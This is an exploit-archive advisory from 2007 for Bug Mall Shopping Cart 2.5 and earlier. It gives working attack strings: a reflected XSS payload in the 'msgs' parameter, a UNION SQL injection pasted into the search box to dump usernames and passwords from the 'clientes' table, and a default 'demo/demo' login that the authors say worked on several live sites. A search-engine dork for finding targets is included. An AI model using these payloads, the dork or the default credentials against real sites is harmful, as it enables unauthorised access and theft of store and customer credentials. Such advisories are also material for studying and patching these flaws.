bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting



Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2007-06-25


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)


SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834


SITE: http://www.bug-mall.org


DORK: Powered by Bug Software intext:Your Cart Contains


EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites
and sucsefully logged in.


EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org</body><html>
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>
EXAMPLE 3: Paste following into search box 
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*


Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-25]